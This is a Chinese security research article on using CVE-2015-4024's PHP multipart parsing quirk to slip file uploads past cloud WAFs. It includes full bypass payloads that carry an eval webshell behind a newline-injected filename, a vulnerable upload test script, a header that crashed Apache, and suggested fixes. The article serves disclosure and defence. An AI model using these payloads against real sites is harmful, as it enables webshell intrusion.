PHP DOS漏洞的新利用:CVE-2015-4024 Reviewed

wyzsk發表於2020-08-19
作者: 破見式 · 2016/01/08 10:03

0x00 背景介紹


今天我們想從2015.04.03的一個PHP遠端dos漏洞(CVE-2015-4024)說起。技術細節見如下連結,中文版:/papers/?id=6077,英文版 :https://bugs.php.net/bug.php?id=69364。因為php解析body part的header時進行字串拼接,而拼接過程重複複製字元導致DOS。事實上該漏洞還有其他非dos的利用價值,其中之一,就是繞過當前各種雲WAF的檔案上傳防禦策略。

目前國內外流行的雲WAF廠商有如百度雲加速,360網站衛士,加速樂,雲盾等。因為PHP遠端dos漏洞及PHP官方修復方案的特點,我們成功利用該漏洞繞過了當前主流WAF的檔案上傳防禦,例如百度雲加速、360網站衛士、知道創於加速樂、安全狗。

接下來,我們以PHP為例,詳細解析我們的繞過方法。

0x01 繞過WAF的原理


根據PHP DOS漏洞原理,在multipart_buffer_headers函式解析header對應value時,value值存在n行。每行的字串以空白符開頭或不存字元':',都觸發以下合併value的程式碼塊。那麼解析header的value就要執行(n-1)次合併value的程式碼塊,從而導致DOS。

#!php
prev_len= strlen(prev_entry.value);
     cur_len= strlen(line);
 
     entry.value= emalloc(prev_len + cur_len + 1); //1次分片記憶體
     memcpy(entry.value,prev_entry.value, prev_len); //1次複製
     memcpy(entry.value+ prev_len, line, cur_len);   //1次複製
     entry.value[cur_len+ prev_len] = '\0';
 
     entry.key= estrdup(prev_entry.key);
 
     zend_llist_remove_tail(header);//1次記憶體釋放

而PHP官方修復方案,在進行合併時,避免重複複製,從而避免DOS。繞過WAF的關鍵在於,PHP multipart_buffer_headers函式解析header對應value時,value值存在多行。每行的字串以空白符開頭或不存字元':',將進行合併。而WAF在解析檔案上傳的檔名時,沒有考慮協議相容,不進行多行合併,就可以被繞過。

根據原理構造繞過WAF檔案上傳防禦的payload,WAF解析到的檔名為”test3.jpg”,而PHP解析到的檔名是“test3.jpg\nf/shell.php”,因為”/”是目錄分隔符,上傳的檔名變為shell.php。以下是繞過paylaod、測試指令碼、paylaod進行檔案上傳的效果圖。

WAF繞過payload:

#!php
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename="test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['c'])?>
------WebKitFormBoundaryx7V4AhipWn8ig52y

檔案上傳功能測試腳:

#!php
<?php
         $name = $_FILES['file']['name'];
        echo $name;
        echo "\n";
        move_uploaded_file($_FILES['file']['tmp_name'] , '/usr/local/nginx/html/upload/'.$_FILES['file']['name']);
        echo "upload success! ".$_FILES['file']['name'];
        echo "\n";
        echo strlen($_FILES['file']['name']);
?>

Payload能夠正常上傳

p1

0x02 繞過WAF實戰


筆者透過搭建自己的測試站,接入360網站衛士和加速樂,驗證繞過WAF檔案上傳防禦的方法。

2.1 繞過360網站衛士

步驟1,驗證網站已被360網站衛士防禦,攔截了直接上傳PHP檔案的請求。

p2

步驟2:成功繞過360網站衛士,上傳shell成功,檔案是apo.php。在該請求中,有沒有Content-Type不影響繞過。

p3

2.2 繞過知道創宇加速樂

步驟一:驗證網站被加速樂保護,攔截了直接上傳PHP檔案的請求。

p4

步驟二:

成功繞過加速樂,上傳shell,檔案是syt.php。

p5

2.3 繞過百度雲加速

百度雲加速與CloudFlare,從百度勻加速攔截頁面可以看出使用的是CloudFlare. 但是估計有本地化,百度雲加速應該是百度和CloudFlare共同產物吧。測試百度沒有搭建自己的測試環境,找了個接入了百度雲加速的站進行測試。

步驟一:驗證網站被百度雲加速保護,攔截了直接上傳PHP檔案的請求。

p6

步驟二:成功繞過雲加速

p7

2.4 安全狗的測試

用該方法測試安全狗的檔案上傳,

#!bash
Content-Disposition: form-data; name="file"; filename="2.php
aa:
Content-Type: image/jpeg

php與aa這間的是%0a,處理請求的Apache程式直接崩潰。感覺可以溢位,沒有深入。

2.5 CloudFlare的測試

為了測試能否繞過國外版的CloudFlare,特意買了它的服務。結果,在規則全開的情況下,競然不攔截檔案上傳。

p8

p9

2.6 Amazon WAF

亞馬遜的WAF沒有規則,所有規則需要使用者配置。在配置的選項裡,沒有檔案上傳的選項,所以也就沒有繞過的說法。國內WAF和國外WAF的區別挺大,為什麼這麼設計還是值得深思。

p10

我們還繞過了其他WAF,這裡不一一列舉。

0x03 擴充套件—更多的工作


3.1 分析filename其他字元的繞過

同理,我們發現除了雙引號外,使用單引號也能繞過WAF的防禦,並實現檔案上傳。

#!php
------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name="file"; filename='test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

<?php eval($_GET['c'])?>
------WebKitFormBoundaryx7V4AhipWn8ig52y

3.2 分析其他應用指令碼語言

我們也發現jsp解析也有自己的特點,同時可被用於繞過WAF。暫時未測試asp,aspx,python等常用的WEB應用指令碼語言。

0x04 修復方案


4.1 修復方案一

解析檔案上傳請求時,如果發現請求不符合協議規範,則拒絕請求。可能會產生誤攔截,需要評估誤攔截的影響範圍。

4.2 修復方案二

相容php的檔案解析方式,解析檔名時,以單引號或雙引號開頭,並且對應的單引號或雙引號閉合。

0x05 總結


本文透過Review PHP遠端dos漏洞(CVE-2015-4024),並利用該特性繞過現有WAF的檔案上傳防禦,成功上傳shell。 更重要的價值,提供給我們一個繞過WAF的新思路,一種研究新方向:利用後端應用指令碼與WAF行為的差異繞過WAF的防禦。總的來說,一款優秀的WAF應該能夠處理相容WEB應用容器、標準協議、web伺服器這間的差異。

本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!

相關文章